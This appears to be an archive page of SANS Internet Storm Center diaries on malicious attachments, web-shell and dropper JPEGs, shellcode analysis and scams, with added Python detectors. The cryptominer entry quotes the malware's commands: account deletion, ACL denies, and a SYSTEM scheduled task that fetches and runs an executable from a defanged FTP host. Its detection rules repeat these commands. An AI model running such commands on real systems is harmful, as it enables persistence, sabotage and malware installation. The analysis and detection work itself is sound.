Tag Archives: SANS

Malicious .tar Attachments, (Sun, Jan 6th)

This post was originally published on this site

We were informed about a malicious email campaign that uses .iso and .tar attachments.

We’ve covered .iso attachments before in the diary entry “Malicious .iso Attachments”: the .iso contains a malicious executable and can be opened with vanilla Windows 8 and later.

For .tar attachments, it’s a bit different. The .tar attachment also contains a malicious executable (tar is a Unix archive format), but it cannot be opened with vanilla Windows. Archiving software like the popular WinZip has to be installed for the user to be able to open the .tar attachment.

Adversaries use .tar files for the same reason as .iso files:

1) the malware is wrapped in a container file, which makes it easier to evade detection

2) the “mark-of-the-web” is not propagated

The “mark-of-the-web” is metadata that indicates that a file originated from the Internet, and is therefore trusted less. It is implemented with alternate data streams. Applications like Outlook create this metadata: when an attachment is opened or saved to disk, the metadata is created to mark it as originating from the Internet.

Here is a .tar file (Dialog42.tar, containing Dialog42.exe) with metadata to mark it as originating from the Internet:

When the .tar file is opened with WinZip to extract the .exe file, the metadata is not propagated to the extracted .exe file:

When the executable is started, no warning is displayed:

If the “mark-of-the-web” had been propagated (i.e. the metadata had been copied from the container to the extracted files), the user would have received a warning before the file was executed:

Using less popular container formats on Windows allows malware authors to evade detection and reduce the number of alerts, at the risk of ending up on a Windows machine that cannot open the container.
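Since the container hides the executable from scanners that only look at the outer file, a gateway or endpoint check has to look inside the archive. The following Python example is added here and is not code from the diary; it walks a .tar attachment and flags members by executable extension, by a PE (MZ) header, or by an unsafe path. The sample archive is constructed in memory and contains only a stub MZ header, not real malware.

```python
import io
import tarfile

# A PE executable starts with "MZ"; this is the header a scanner should look for
# regardless of the name the member carries.
PE_MAGIC = b"MZ"
RISKY_SUFFIXES = (".exe", ".scr", ".dll", ".js", ".vbs", ".hta", ".bat", ".cmd", ".ps1")


def scan_tar_attachment(tar_bytes):
    """Return a list of (member name, reason) for members that should be treated
    as executable content even though the outer .tar looks like a plain archive."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            reasons = []
            if member.name.lower().endswith(RISKY_SUFFIXES):
                reasons.append("executable extension")
            fh = tar.extractfile(member)
            head = fh.read(2) if fh else b""
            if head == PE_MAGIC:
                reasons.append("PE header (MZ)")
            # Path traversal in member names is another classic archive abuse.
            if member.name.startswith(("/", "..")) or "/../" in member.name:
                reasons.append("unsafe path")
            if reasons:
                findings.append((member.name, ", ".join(reasons)))
    return findings


def build_sample_tar(members):
    """Constructed sample: build an in-memory .tar from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed attachment: a stub "PE" (MZ header followed by zeros, not a real
# program), a harmless text file and a double-extension screensaver name.
SAMPLE_TAR = build_sample_tar({
    "Dialog42.exe": b"MZ" + b"\x00" * 62,
    "invoice.txt": b"plain text, nothing to see",
    "readme.pdf.scr": b"not a PE, but a screensaver extension",
})

if __name__ == "__main__":
    for name, reason in scan_tar_attachment(SAMPLE_TAR):
        print(f"{name}: {reason}")
```

On Windows the same check can be extended by re-applying the Zone.Identifier stream to whatever is extracted, which is exactly what WinZip does not do here.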

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A Malicious JPEG? Second Example, (Sat, Jan 5th)


The JPEG image I wrote about in yesterday’s diary entry “A Malicious JPEG?” reminded me of another example that was mentioned on Twitter a couple of weeks ago.

The JPEG image mentioned in that Tweet (71dedb3a79245edb0b4987c2754f515c) is indeed a valid JPEG:

In this report by jpegdump.py, we can see that this JPEG image is composed of all the right segments. But notice that there is data appended after the End Of Image (EOI) segment: entry 13 *trailing*.

We can select entry 13 to take a peek inside:

It’s a VBS script that writes a file to disk and executes it. The dropped file is embedded as a long hexadecimal string, which can be extracted with base64dump.py:

The embedded file is a malicious executable (MZ): ff5e1f27193ce51eec318714ef038bef. This is a Ramnit worm sample, first submitted to VirusTotal in 2010 (the JPEG file was first submitted in December 2018).

Like the JPEG image discussed in yesterday’s diary entry, the malicious content of this JPEG image will not execute when the image is viewed with an image viewer or browser.

For the script to execute, this JPEG file has to be opened as an HTML application (HTA). mshta.exe, the application that executes HTA files, ignores all the binary data of the JPEG image and parses and executes the script between the <SCRIPT> tags. This can be achieved by saving the JPEG image with an .hta extension and then launching it, or by running mshta.exe with a URL argument that points to this JPEG image.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


A Malicious JPEG?, (Fri, Jan 4th)


I was given a JPEG image detected by an anti-virus. As you can see on VirusTotal, several AVs detect this JPEG image. Could I tell if this image could have infected the Windows machine it was found on?

Let’s take a look.

FF D8 is the first segment of a JPEG image (SOI: Start Of Image). This is indeed a JPEG file, and we can analyze it with a tool I developed to analyze JPEG files, jpegdump.py:

jpegdump produces a list of the segments found inside the JPEG image. The 3rd segment, FF FE or COM, is a comment. JPEG images can contain comments, but it’s rather unusual to find them.

We can select the COM segment to see what’s inside:

It contains a PHP command, and that’s what triggers the AVs on VirusTotal: I removed the PHP command, and the jpeg no longer triggers AVs on VirusTotal.

This image cannot infect a Windows machine when it is viewed. Comment segments are parsed and ignored by image viewers (including browsers); they are not executed.

So why does this image trigger AVs, and why does it contain this comment?

Images like these have been going around for several years (this one was actually first submitted to VirusTotal in 2013): they are used on compromised servers to hide a web shell. To evade detection, adversaries split up the components of their web shell over several files, sometimes even over different servers. A PHP eval command like this is hidden inside a file such as an image, to be retrieved later by another component and executed.

China Chopper is an old example of such a web shell that has been documented in depth.

If you find such a file on a Windows machine (for example in the browser cache), the Windows machine has not been infected. No reason to worry. Unless it was downloaded from a server you own: then you have to take a close look at that server.

If you find such a file on a server, especially on a PHP webserver, then there’s a high probability that your server is compromised.

I’ve been seeing such JPEG images for many years, because they trigger the anti-virus on Windows machines when users browse web servers that host such JPEG images. The PHP command is often hidden in the EXIF metadata, or sometimes just appended to the end of the JPEG image (after FF D9 EOI, End Of Image).
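As an added example (not code from the diaries and not jpegdump.py itself), here is a minimal JPEG segment walker in Python that covers both tricks discussed in this entry and the previous one: a PHP command hidden in a COM segment, and a script appended after the EOI marker. The two sample files are constructed in the code as bare JPEG skeletons (valid marker structure, not decodable pictures) with placeholder strings instead of payloads.

```python
import struct

MARKER_NAMES = {0xD8: "SOI", 0xD9: "EOI", 0xDA: "SOS", 0xFE: "COM", 0xE0: "APP0",
                0xE1: "APP1", 0xDB: "DQT", 0xC0: "SOF0", 0xC4: "DHT"}
NO_LENGTH = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))   # SOI, EOI, TEM, RSTn


def jpeg_segments(data):
    """Walk the marker segments of a JPEG as (name, offset, payload) tuples;
    anything after EOI is reported as a 'trailing' pseudo-segment."""
    segs, pos, n = [], 0, len(data)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError("expected 0xFF marker prefix at offset %#x" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte, skip it
            pos += 1
            continue
        name = MARKER_NAMES.get(marker, "%02X" % marker)
        if marker in NO_LENGTH:
            segs.append((name, pos, b""))
            pos += 2
            if marker == 0xD9:                   # EOI: the image ends here
                if pos < n:
                    segs.append(("trailing", pos, data[pos:]))
                return segs
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        segs.append((name, pos, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
        if marker == 0xDA:                       # SOS: skip entropy-coded data
            start = pos
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                        # a real marker, not FF00 or RSTn
                pos += 1
            segs.append(("entropy", start, data[start:pos]))
    return segs


def jpeg_findings(data):
    """Flag PHP in a comment segment and script/data appended after EOI."""
    findings = []
    for name, offset, payload in jpeg_segments(data):
        low = payload.lower()
        if name == "COM" and (b"<?php" in low or b"eval(" in low):
            findings.append(("php-in-comment", offset, len(payload)))
        elif name == "trailing":
            kind = "script-after-eoi" if b"<script" in low else "data-after-eoi"
            findings.append((kind, offset, len(payload)))
    return findings


def build_sample(comment, trailing):
    """Constructed JPEG skeleton: SOI, APP0, COM, SOS + scan data, EOI, trailing."""
    app0 = b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"\xFF\xFE" + struct.pack(">H", 2 + len(comment)) + comment
    sos = b"\xFF\xDA" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3F\x00"
    scan = b"\x12\x34\xFF\x00\x56\x78"            # includes one stuffed FF00 byte pair
    return b"\xFF\xD8" + app0 + com + sos + scan + b"\xFF\xD9" + trailing


# Placeholder strings only: neither sample carries a working payload.
WEBSHELL_STYLE = build_sample(b"<?php eval(PLACEHOLDER_NOT_A_PAYLOAD); ?>", b"")
HTA_STYLE = build_sample(b"created by constructed sample",
                         b"<html><SCRIPT Language=VBScript>' placeholder</SCRIPT></html>")

if __name__ == "__main__":
    for sample in (WEBSHELL_STYLE, HTA_STYLE):
        print([s[0] for s in jpeg_segments(sample)], jpeg_findings(sample))
```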


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Malicious Script Leaking Data via FTP, (Wed, Jan 2nd)


The last day of 2018, I found an interesting Windows cmd script which was uploaded from India (SHA256: dff5fe50aae9268ae43b76729e7bb966ff4ab2be1bd940515cbfc0f0ac6b65ef) with a very low VT score[1]. The script is not obfuscated and contains a long list of commands based on standard Windows tools. Here are some examples:

It removes existing users and kills processes:

net1 user mm123$ /del
net1 user admin1$ /del
net1 user sysadm05 /del
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe

It changes access rights on executable files:

attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe
attrib -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe
attrib -s -h -r C:\Users\Default\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe
attrib -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe
attrib -s -h -r C:\Users\asp\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Roaming\*.exe
cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone
cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone
cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system
cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone
cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d system
cacls C:\Users\Default\AppData\Roaming\Tempo /e /d system
cacls C:\Users\Default\AppData\Roaming\Tempo /e /d everyone
cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system

It creates scheduled tasks for persistence:

schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp[.]1226bye[.]xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system"  /sc onstart /F

Files are downloaded from an FTP server. The downloaded PE file is, in the case above, a cryptominer (SHA256: 7f78d8a2cf889230fcd0dcd3d12418835c6c2e37ea396c13ae5222eccd978e8a[2]). It downloads more interesting files, again from an FTP server. One of them is a text file containing a list of processes to kill:

conime.exe,C:\Program Files (x86)\Common Files\conime.exe,1
svshpst.exe,C:\Program Files (x86)\Common Files\svshpst.exe,1
svchsot.exe,C:\Program Files\Common Files\System\svchsot.exe,1
csrswz.exe,C:\Program Files\Common Files\csrswz.exe,1

PowerShell scripts were also downloaded and executed to perform interesting activities. The most interesting one? The infected systems connect to another FTP server and upload a flat file named after the victim’s IP addresses: ‘<publicip>_<localip>.txt’. The files contain the Windows version, the CPU usage (percentage) and a list of all running processes. I tried to access some of the uploaded files, but another process on the malicious FTP server was collecting them in real time. However, it was possible to list them (well, most of them). I wrote a quick script to keep an eye on the FTP server and left it running for 2 days: 35984 unique IP addresses were collected! The top 5 infected countries are:

  • Russia
  • China
  • Taiwan
  • Ukraine
  • India

Who said that cryptominers are not popular?
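The script above is not obfuscated, so its behaviour can be matched directly on process command lines (for example from Sysmon or 4688 events). The following Python triage is added here and is not part of the diary; its indicators are derived from the lines shown above (FTP script built with echo, download-then-execute, SYSTEM scheduled task, account deletion, ACL denies, mass taskkill), and the sample lines are constructed from the script with the domain kept defanged.

```python
import re

# Indicators derived from the behaviours the script above exhibits. Each is a
# (name, regex) pair matched against one command line at a time.
INDICATORS = [
    ("ftp-script-built-with-echo",         # echo open <host>>f ... ftp -s:f
     re.compile(r"echo\s+open\s+\S+\s*>\s*(\S+).*\bftp\s+-s:\1", re.I)),
    ("ftp-download-then-run",              # ftp -s:f & c:\...\something.exe
     re.compile(r"\bftp\s+-s:\S+.*&\s*[a-z]:\\[^&]*\.exe", re.I)),
    ("schtasks-as-system",                 # persistence that runs as SYSTEM
     re.compile(r"\bschtasks\b.*/create.*/ru\s+\"?system\"?", re.I)),
    ("local-account-deleted",              # net1 user <name> /del
     re.compile(r"\bnet1?\s+user\s+\S+\s+/del\b", re.I)),
    ("acl-deny-everyone-or-system",        # cacls ... /e /d everyone|system
     re.compile(r"\bcacls\b.*/d\s+(everyone|system)\b", re.I)),
    ("mass-taskkill",                      # taskkill with three or more /im targets
     re.compile(r"\btaskkill\b(?:.*\s/im\s+\S+){3,}", re.I)),
]


def classify_cmdline(cmdline):
    """Return the names of all indicators that fire on a single command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def triage(lines):
    """Map line index -> indicator names, keeping only the lines that fired."""
    result = {}
    for i, line in enumerate(lines):
        hits = classify_cmdline(line)
        if hits:
            result[i] = hits
    return result


# Constructed sample: four lines taken from the script above (domain defanged)
# plus one benign line that must not fire.
SAMPLE_LINES = [
    r"net1 user mm123$ /del",
    r"taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im conime.exe /im a.exe",
    r"cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone",
    r'schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp[.]1226bye[.]xyz>ps&echo test>>ps'
    r'&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps'
    r'&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F',
    r"ping -n 1 example.invalid",
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_LINES).items():
        print(idx, hits)
```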

[1] https://www.virustotal.com/#/file/dff5fe50aae9268ae43b76729e7bb966ff4ab2be1bd940515cbfc0f0ac6b65ef/detection
[2] https://www.virustotal.com/#/file/7f78d8a2cf889230fcd0dcd3d12418835c6c2e37ea396c13ae5222eccd978e8a/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant


Gift Card Scams on the rise, (Wed, Jan 2nd)


Most people are very helpful and try to be good neighbors and citizens. This is even more prevalent during the holiday season. There are those who take advantage of the season and people’s helpfulness in order to scam them out of money. One that is hitting right now, with a very targeted approach, is the gift card scam. These do not only occur during the holidays, but there are more reports of them during the season of giving. The flow of the scam is generally the same for most of those being reported. An individual is targeted by someone purporting to be their management from higher up in the chain of command. The request is usually via email, with an urgent demand for the purchase of gift cards to give to clients. The attacker has done their research to learn the personnel that work in the particular office. Here is an example of one of the scams that was submitted to us by Keegan Mills. The names have been changed/obfuscated in the incident.

Background information: “Spoofed_Pres” is the president/CEO of the company. Her contact information is widely distributed. The initial target, “Target_One”, was very new to the company in a junior position. According to Keegan: “We were a bit surprised the actors even found her as a contact.” Due to the number of emails exchanged (over 30) in the attempt to fulfil this request, I am only showing a few of the key ones here in the thread.

The first contact came as an urgent request from the CEO to see if “Target_One” was in the office.  The name that appeared was the correct name of the CEO, but it was not the correct email address:


Once Target_One responded that they were in the office, the directions followed:


Target_One contacted the correct POC at the company to get the company card, and help was enlisted from two other people (at one point three others) in order to fulfil the request for the urgent gift cards. However, there was an issue with the credit card not working at the store. At this point, Target_One is instructed to use their own funds to buy the cards and they will be reimbursed.


Also, as soon as they were able to get the gift cards, they should send a picture of the PIN immediately. This was a recurring theme throughout the email exchange. They could not get that many cards from a single location, so they were attempting multiple stores. The commute between stores also adds to the time this scenario plays out.


This entire effort lasted about five hours before it was finally realized that it was not a legitimate email from the CEO/President. I don’t know if any gift cards were actually purchased; however, think about the time lost and the cost salary-wise: five hours of salary for three people at a minimum! Then there is the time to work the incident and do any mitigation afterwards.

We received several examples of these, and the verbiage is not verbatim between them. Here is another example (thank you Brad Theodore):


I am including this exchange for you to read on your own if you wish. It’s another example of the gift card attempts (thank you Chris Rovers), with a user who had a conversation with the scammer before questioning whether they should really be doing this: https://isc.sans.edu/diaryimages/files/GiftCardPhish_Anonymized.txt

Before you think this could never happen in your company, be careful! This was a targeted attack, not just a phishing attempt. A new employee gets an urgent email from a superior that asks them for help immediately. They will jump through hoops to help!! Especially if the superior is in a meeting and needs it ASAP. The attackers are taking the time to do their research and change their tactics. We need to make sure we are taking the time to really train our employees as well.


Maldoc with Nonfunctional Shellcode, (Wed, Jan 2nd)


Maldoc 15ee2c2f3f01eda532b91dff9f4bcc53 is a malicious RTF document with an exploit for an old vulnerability (CVE-2010-3333).

If you open this document in a sandbox, you will not see malicious activity. That’s because the shellcode it contains, triggered by the exploit, is nonfunctional. A static analysis is required to know more about this maldoc.

A static analysis is not too difficult. It’s an RTF document, and can thus be analyzed with rtfdump.py:

There are not many items, and we can see that item 11 contains many hexadecimal characters (h=938).

This can be decoded with the following command:

From the anti-virus alerts on VirusTotal, we know that there is an exploit in this document. String AAAA… is often used to overflow buffers.

And at the end we see a small command. If you pay close attention to the dump, you might even reconstruct the string urlmon.

So this is very likely shellcode, probably a downloader. But where is the URL?

Let’s write this binary data to disk and analyze it with NASM’s disassembler:

This is not shellcode, but if we look after the buffer overflow string AAA… (0x41 0x41 0x41…), we see a jump instruction, and more importantly, a reference to FS 0x30.

On 32-bit Windows, the FS segment register is used to access the Thread Information Block, and offset 0x30 gives access to the Process Environment Block. These data structures are often accessed by shellcode to look up Win32 API addresses.

Hence, it’s very likely that address 0xEF is the entry point of the shellcode. We can try that out with the shellcode emulator scdbg: it has an option to provide the entry point (-foff). We’ll let the emulation start from address EF:

This is indeed shellcode and 0xEF is the entry point: this shellcode downloads a payload, writes it to disk as a.exe and then executes it. But we see no URL.

Let’s grep for URLDownloadToFile and see what gets written on the stack (option -vv increases the verbosity to a level where we see the register values at each emulated instruction):

Register edi contains the address of the URL: 0x004011D5. What do we find at this address? Nothing:

This shellcode can’t download anything, because the malware author made a mistake and did not include the URL.

If you really want to be sure that this shellcode is a downloader, and that the only thing missing is the URL, you can add your own URL to the shellcode and emulate it. This can be done with option -spoke (string poke): this option allows you to write a string to memory before the shellcode gets emulated. Let’s write a URL at address 0x4011D5 like this:

This confirms it: the emulated shellcode now downloads from the URL we provided.

It doesn’t happen often, but you can be in a position that you have to analyze non-working malware. Here, our analysis could not reveal the payload, simply because the URL is missing.

There are functional variants of this exploit on VirusTotal, like this one.

You can even find a sample on GitHub.
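The static steps above (decode the hex item, find the end of the AAAA… filler, look for the FS:[0x30] access and nearby jump, recover strings such as urlmon) can be scripted as a first-pass triage before reaching for an emulator. The Python below is an added example, not code from the diary or from rtfdump.py/scdbg; the PEB-access byte patterns are the standard 32-bit encodings of mov reg, fs:[0x30], and the sample item is constructed (filler, a jump over NOPs, one fs:[0x30] read and a string) with no working payload.

```python
import re

# 32-bit x86 encodings that read the PEB pointer through fs:[0x30]; shellcode
# resolves Win32 API addresses by walking the PEB, so these bytes are a strong hint.
PEB_ACCESS = re.compile(
    rb"\x64\xA1\x30\x00\x00\x00"                          # mov eax, fs:[0x30]
    rb"|\x64\x8B[\x0D\x15\x1D\x35\x3D]\x30\x00\x00\x00"   # mov ecx/edx/ebx/esi/edi, fs:[0x30]
    rb"|\x64\x8B[\x40\x41\x42\x43\x45\x46\x47]\x30"       # mov eax, fs:[reg+0x30]
)
SHORT_JMP = re.compile(rb"\xEB[\x00-\x7F]")               # jmp rel8, forward


def hex_item_to_bytes(hex_text):
    """Decode the hex characters of an RTF item (what rtfdump.py does when dumping it)."""
    return bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", hex_text))


def find_overflow_run(blob, filler=b"A", minimum=16):
    """Offset and length of the first long run of filler bytes (the AAAA... string)."""
    m = re.search(rb"(?:" + re.escape(filler) + rb"){%d,}" % minimum, blob)
    return (m.start(), m.end() - m.start()) if m else None


def shellcode_hints(blob):
    """Static triage of a decoded item: where the filler ends, where fs:[0x30] is
    touched, where short jumps sit, and printable strings after the filler.
    entry_guess is a heuristic (first jump after the filler, else first PEB access)
    that still has to be confirmed with an emulator such as scdbg -foff."""
    run = find_overflow_run(blob)
    after = run[0] + run[1] if run else 0
    peb = [m.start() for m in PEB_ACCESS.finditer(blob, after)]
    jmps = [m.start() for m in SHORT_JMP.finditer(blob, after)]
    strings = [s.decode("ascii") for s in re.findall(rb"[ -~]{5,}", blob[after:])]
    entry = jmps[0] if jmps else (peb[0] if peb else None)
    return {"overflow": run, "peb_refs": peb, "short_jmps": jmps,
            "strings": strings, "entry_guess": entry}


# Constructed sample, not the maldoc's bytes: filler, a short jump over NOPs, the
# classic fs:[0x30] read and the string "urlmon.dll". There is no working payload.
SAMPLE_HEX = (
    "41" * 32                     # 'A' * 32 overflow filler
    + "EB05" + "90" * 5           # jmp +5 over five NOPs
    + "31C0" + "648B4030"         # xor eax, eax ; mov eax, fs:[eax+0x30]
    + "75726C6D6F6E2E646C6C00"    # "urlmon.dll\0"
)

if __name__ == "__main__":
    print(shellcode_hints(hex_item_to_bytes(SAMPLE_HEX)))
```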

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Make a Wheel in 2019!, (Tue, Jan 1st)


I want to inspire you to take the time to create something in 2019. A program, a protocol, a policy, a howto, … Something, anything, that brings you out of your comfort zone.

It doesn’t have to be something complex. Simple works too.

The process of creation is important, not so much the end result (the journey matters more than the destination here).

Because you want this creation process to help you acquire new skills and gain new understandings.

If you can, make something that you will use, because that will motivate you to continue your journey.

It doesn’t have to be something new. Making a wheel is not the same as “reinventing the wheel”. When you want to learn how to make wheels, you’re not reinventing wheels.



I started making my PDF tools in 2008. Not because there were no “low-level” PDF analysis tools (PDF Structazer was the first, if I’m not mistaken), but because I wanted to understand the internals of PDFs. Making tools to parse PDF documents was and still is a very interesting journey for me. One day, I want to start another journey: rewrite my PDF tools, because they have evolved incrementally while my PDF understanding grew, and I would develop them quite differently now with all I’ve learned during this journey. But that is another story.

Choose a stimulating journey! Acquire new skills, gain a deeper understanding along the way! Don’t worry about the destination.


Happy New Year from the Internet Storm Center!

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


Software Crashes: A New Year’s Resolution, (Mon, Dec 31st)


Recently, I experienced a couple of stop errors (also known as the Blue Screen of Death) on a Windows machine that I was able to fix with the help of NirSoft’s BlueScreenView utility. With this utility, I immediately pinpointed the cause of the crashes to a driver that I was able to update.

And that reminded me of another NirSoft tool: AppCrashView.

Like BlueScreenView, AppCrashView is a convenient GUI program that presents the application crash reports found in the WER folder in a table:

I used to take a regular look at the application crashes on my machine, to identify applications that could have security problems, like buffer overflows. Depending on the results and the frequency of crashes, I would update or replace the application. And sometimes, it was the starting point of vulnerability research.

I will make this a habit again, and you could too, as AppCrashView is a simple, convenient program that gives a tabular overview of application crashes without requiring a debugger. If you want to do this in a more organized and scalable way, know that application crashes are also recorded in the Windows Application event log.

Please post a comment if you have tips or suggestions to monitor application crashes.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com


OWASP Top 10 Internet of Things 2018, (Sun, Dec 30th)


OWASP released “OWASP Top 10 Internet of Things 2018”. “The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies.”

1-Weak, Guessable, or Hardcoded Passwords

Use of easily bruteforced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems.

2-Insecure Network Services

Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control…

3-Insecure Ecosystem Interfaces

Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.

4-Lack of Secure Update Mechanism

Lack of ability to securely update the device. This includes lack of firmware validation on device, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.

5-Use of Insecure or Outdated Components

Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms, and the use of third-party software or hardware components from a compromised supply chain.

6-Insufficient Privacy Protection

User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.

7-Insecure Data Transfer and Storage

Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.

8-Lack of Device Management

Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.

9-Insecure Default Settings

Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.

10-Lack of Physical Hardening

Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.





Video: De-DOSfuscation Example, (Sat, Dec 29th)


I created a video showing how to de-obfuscate a DOSfuscated PowerShell command obtained from a maldoc I analyzed in diary entry “De-DOSfuscation Example”:

This is the obfuscated command:

In the video, I rely mainly on my tool numbers-to-string to do the de-obfuscation.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com
